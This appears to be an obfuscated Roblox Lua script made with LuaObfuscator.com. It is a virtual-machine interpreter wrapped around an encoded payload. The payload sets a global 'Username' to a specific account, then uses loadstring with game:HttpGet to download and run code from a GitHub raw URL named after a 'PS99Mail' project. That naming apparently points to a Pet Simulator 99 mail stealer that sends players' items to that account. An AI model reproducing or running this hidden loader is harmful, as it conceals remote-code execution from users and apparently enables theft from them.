--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%1) ;else local v84=(570 -(367 + (1078 -(282 + 595))))^(v32-(928 -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + (1637 -(1523 + 114)))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * (1321 -(16 + 52 + 997))) + v36 ;end if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;v35=(958 -(892 + 65)) + 0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -(182 -(67 + 113))) ;return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 263))) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1 + (0 -0) ,49 -29 ) * ((2 + 0)^32)) + v42 ;local v46=v20(v43,21,(141 -(10 + 8)) -92 );local v47=((v20(v43,984 -(802 + 150) )==((7 -5) -1)) and  -(1 -(442 -(416 + 26)))) or (1 + 0) ;if (v46==(997 -(915 + 82))) then if (v45==0) then return v47 * (0 -0) ;else v46=(3 -2) + 0 ;v44=0 -0 ;end elseif (v46==(3234 -(1069 + 118))) then return ((v45==(0 -0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (v44 + (v45/((2 + 0)^(843 -(368 + 423))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(438 -(145 + 293))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v65=1 -0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=1445 -(1290 + 155) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=(3 -1)) then else local v88=0 + 0 ;while true do if (v88==1) then v51=3;break;end if (v88~=(0 -0)) then else local v97=0;while true do if (v97~=1) then else v88=1;break;end if (0~=v97) then else v56=nil;v57=nil;v97=66 -(30 + 35) ;end end end end end if (v51~=(3 + 0)) then else v58=nil;while true do local v90=1257 -(1043 + 214) ;local v91;local v92;while true do if (v90==1) then while true do if (v91==(0 -0)) then v92=1212 -(323 + 889) ;while true do if (v92==1) then if (v52==1) then local v161=0;local v162;while true do if (v161==(0 -0)) then v162=580 -(361 + 219) ;while true do if (v162~=0) then else local v167=0;local v168;while true do if (v167~=(320 -(53 + 267))) then else v168=0 + 0 ;while true do if (v168==0) then local v175=0;while true do if ((413 -(15 + 398))~=v175) then else v56={v53,v54,nil,v55};v57=v23();v175=1 + 0 ;end if (v175~=(1 + 0)) then else v168=851 -(20 + 830) ;break;end end end if (v168==1) then v162=1;break;end end break;end end end if (v162==1) then v58={};v52=2;break;end end break;end end end if ((0 + 0)==v52) then local v163=0;local v164;while true do if (v163==0) then v164=126 -(116 + 10) ;while true do if (v164==1) then v55={};v52=1 + 0 ;break;end if (v164~=0) then else local v169=0;local v170;while true do if (v169==(738 -(542 + 196))) then v170=0;while true do if (v170~=1) then else v164=1;break;end if ((0 -0)==v170) then local v176=0 + 0 ;while true do if (v176==(1 + 0)) then v170=1 + 0 ;break;end if (v176==(0 -0)) then v53={};v54={};v176=2 -1 ;end end end end break;end end end end break;end end end break;end if (v92==0) then local v148=1551 -(1126 + 425) ;local v149;while true do if ((405 -(118 + 287))~=v148) then else v149=0 -0 ;while true do if (v149~=1) then else v92=1122 -(118 + 1003) ;break;end if (v149~=0) then else if (v52~=2) then else local v171=0 -0 ;local v172;while true do if (v171==0) then v172=0;while true do if (v172==(378 -(142 + 235))) then for v180=4 -3 ,v23() do local v181=0 + 0 ;local v182;local v183;local v184;local v185;while true do if (1==v181) then v184=nil;v185=nil;v181=2;end if (v181~=(979 -(553 + 424))) then else while true do if (v182~=(1 -0)) then else v185=nil;while true do if (v183==(1 + 0)) then while true do if ((0 + 0)~=v184) then else v185=v21();if (v20(v185,1 + 0 ,1)~=0) then else local v200=0;local v201;local v202;local v203;local v204;local v205;local v206;while true do if (v200==3) then while true do if (v201~=1) then else v204=nil;v205=nil;v201=2;end if (v201==0) then local v209=0;while true do if (v209~=(1 + 0)) then else v201=1;break;end if ((0 + 0)==v209) then v202=0;v203=nil;v209=1;end end end if (v201==2) then v206=nil;while true do if (v202~=1) then else local v210=0;local v211;while true do if (v210~=(0 -0)) then else v211=0;while true do if (v211~=1) then else v202=5 -3 ;break;end if (v211~=0) then else v205=nil;v206=nil;v211=1;end end break;end end end if (v202==(0 -0)) then local v212=0 + 0 ;local v213;while true do if (v212==0) then v213=0;while true do if (v213==0) then v203=0 -0 ;v204=nil;v213=754 -(239 + 514) ;end if (v213==(1 + 0)) then v202=1330 -(797 + 532) ;break;end end break;end end end if (v202~=(2 + 0)) then else while true do if (v203~=(1 + 0)) then else local v214=0;while true do if ((0 -0)~=v214) then else local v223=0;while true do if (1~=v223) then else v214=1;break;end if (v223==(1202 -(373 + 829))) then v206={v22(),v22(),nil,nil};if (v204==0) then local v226=0;local v227;while true do if (v226~=0) then else v227=1130 -(369 + 761) ;while true do if (v227~=(0 + 0)) then else v206[5 -2 ]=v22();v206[7 -3 ]=v22();break;end end break;end end elseif (v204==1) then v206[241 -(64 + 174) ]=v23();elseif (v204==2) then v206[3]=v23() -((1 + 1)^(23 -7)) ;elseif (v204~=(339 -(144 + 192))) then else local v234=0;local v235;while true do if (v234~=0) then else v235=216 -(42 + 174) ;while true do if ((0 + 0)~=v235) then else v206[3]=v23() -(2^16) ;v206[4]=v22();break;end end break;end end end v223=1 + 0 ;end end end if (1~=v214) then else v203=1 + 1 ;break;end end end if (v203==3) then if (v20(v205,3,1507 -(363 + 1141) )~=(1581 -(1183 + 397))) then else v206[11 -7 ]=v58[v206[4]];end v53[v180]=v206;break;end if ((0 + 0)~=v203) then else local v216=0 + 0 ;local v217;while true do if (v216~=0) then else v217=0;while true do if (v217~=(1976 -(1913 + 62))) then else v203=1;break;end if (v217~=0) then else local v224=0 + 0 ;local v225;while true do if (v224~=(0 -0)) then else v225=0;while true do if (v225~=(1933 -(565 + 1368))) then else v204=v20(v185,7 -5 ,3);v205=v20(v185,4,1667 -(1477 + 184) );v225=1;end if (v225==(1 -0)) then v217=1 + 0 ;break;end end break;end end end end break;end end end if (v203~=(858 -(564 + 292))) then else local v218=0 -0 ;local v219;local v220;while true do if (v218==(0 -0)) then v219=304 -(244 + 60) ;v220=nil;v218=1 + 0 ;end if (v218~=1) then else while true do if (v219==(476 -(41 + 435))) then v220=0;while true do if (v220~=(1001 -(938 + 63))) then else local v228=0 + 0 ;local v229;while true do if (v228~=0) then else v229=0;while true do if (v229~=0) then else local v236=0;while true do if (v236~=(1125 -(936 + 189))) then else if (v20(v205,1 + 0 ,1614 -(1565 + 48) )~=(1 + 0)) then else v206[2]=v58[v206[2]];end if (v20(v205,2,1140 -(782 + 356) )==(268 -(176 + 91))) then v206[3]=v58[v206[3]];end v236=1;end if (v236==(2 -1)) then v229=1;break;end end end if (v229~=(1 -0)) then else v220=1093 -(975 + 117) ;break;end end break;end end end if (v220~=(1876 -(157 + 1718))) then else v203=3;break;end end break;end end break;end end end end break;end end break;end end break;end if (v200==(0 + 0)) then v201=0;v202=nil;v200=1;end if (v200~=(3 -2)) then else v203=nil;v204=nil;v200=6 -4 ;end if (v200==(1020 -(697 + 321))) then v205=nil;v206=nil;v200=3;end end end break;end end break;end if (v183~=(0 -0)) then else local v193=0;local v194;while true do if (v193~=0) then else v194=0 -0 ;while true do if (v194~=1) then else v183=1;break;end if (v194==(0 -0)) then local v207=0 + 0 ;while true do if (v207==(0 -0)) then v184=0;v185=nil;v207=2 -1 ;end if (v207~=(1228 -(322 + 905))) then else v194=1;break;end end end end break;end end end end break;end if (v182==0) then v183=0;v184=nil;v182=612 -(602 + 9) ;end end break;end if (v181==(1189 -(449 + 740))) then v182=872 -(826 + 46) ;v183=nil;v181=948 -(245 + 702) ;end end end v52=9 -6 ;break;end if (0==v172) then local v177=0 + 0 ;while true do if (v177==1) then v172=1899 -(260 + 1638) ;break;end if (v177==(440 -(382 + 58))) then for v187=1,v57 do local v188=0;local v189;local v190;local v191;while true do if (v188~=(0 -0)) then else v189=0 + 0 ;v190=nil;v188=1 -0 ;end if (v188~=1) then else v191=nil;while true do if (v189~=(0 -0)) then else local v195=1205 -(902 + 303) ;local v196;while true do if (v195==0) then v196=0 -0 ;while true do if (v196==0) then local v208=0 -0 ;while true do if (v208==1) then v196=1 + 0 ;break;end if ((1690 -(1121 + 569))==v208) then v190=v21();v191=nil;v208=215 -(22 + 192) ;end end end if (v196~=1) then else v189=684 -(483 + 200) ;break;end end break;end end end if (v189==(1464 -(1404 + 59))) then if (v190==1) then v191=v21()~=0 ;elseif (v190==2) then v191=v24();elseif (v190~=(8 -5)) then else v191=v25();end v58[v187]=v191;break;end end break;end end end v56[3 -0 ]=v21();v177=1;end end end end break;end end end if (v52~=3) then else local v173=765 -(468 + 297) ;local v174;while true do if ((562 -(334 + 228))~=v173) then else v174=0;while true do if (v174==(0 -0)) then local v178=0;local v179;while true do if (v178==0) then v179=0 -0 ;while true do if (v179~=(0 -0)) then else local v192=0;while true do if (v192==0) then for v198=1 + 0 ,v23() do v54[v198-(237 -(141 + 95)) ]=v28();end return v56;end end end end break;end end end end break;end end end v149=1 + 0 ;end end break;end end end end break;end end break;end if (v90~=0) then else v91=0 -0 ;v92=nil;v90=1;end end end break;end if (v51==(0 -0)) then v52=0 + 0 ;v53=nil;v51=2 -1 ;end if (v51==1) then v54=nil;v55=nil;v51=2;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=3) then if (v80<=1) then if (v80==0) then local v98=v79[2];v77[v98]=v77[v98](v13(v77,v98 + 1 ,v72));elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end elseif (v80>2) then local v100=0;local v101;local v102;local v103;local v104;local v105;while true do if (v100==8) then v105=v79[2];v77[v105]=v77[v105](v13(v77,v105 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v100=9;end if (v100==2) then v71=v71 + 1 ;v79=v67[v71];if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end v71=v71 + 1 ;v100=3;end if (v100==0) then v101=nil;v102,v103=nil;v104=nil;v105=nil;v100=1;end if (v100==6) then v79=v67[v71];v105=v79[2];v102,v103=v70(v77[v105](v13(v77,v105 + 1 ,v79[3])));v72=(v103 + v105) -1 ;v100=7;end if (3==v100) then v79=v67[v71];if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end v71=v71 + 1 ;v79=v67[v71];v100=4;end if (v100==4) then v105=v79[2];v104=v77[v79[3]];v77[v105 + 1 ]=v104;v77[v105]=v104[v79[4]];v100=5;end if (v100==1) then v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v61[v79[3]]=v77[v79[2]];v100=2;end if (v100==7) then v101=0;for v143=v105,v72 do v101=v101 + 1 ;v77[v143]=v102[v101];end v71=v71 + 1 ;v79=v67[v71];v100=8;end if (v100==5) then v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v100=6;end if (v100==9) then v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];do return;end break;end end else do return;end end elseif (v80<=5) then if (v80>4) then v77[v79[2]]=v79[3];else local v108=0;local v109;local v110;local v111;local v112;while true do if (v108==0) then v109=v79[2];v110,v111=v70(v77[v109](v13(v77,v109 + 1 ,v79[3])));v108=1;end if (v108==2) then for v146=v109,v72 do local v147=0;while true do if (v147==0) then v112=v112 + 1 ;v77[v146]=v110[v112];break;end end end break;end if (v108==1) then v72=(v111 + v109) -1 ;v112=0;v108=2;end end end elseif (v80<=6) then v77[v79[2]]();elseif (v80==7) then local v116=0;local v117;local v118;while true do if (v116==0) then v117=v79[2];v118=v77[v79[3]];v116=1;end if (1==v116) then v77[v117 + 1 ]=v118;v77[v117]=v118[v79[4]];break;end end else v61[v79[3]]=v77[v79[2]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!063O0003083O00557365726E616D65030E3O0066616C636F6E706F696E65616C74030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000A3O0012033O00023O00124O00013O00124O00033O00122O000100043O00202O00010001000500122O000300066O000100039O0000026O000100016O00017O00",v9(),...);
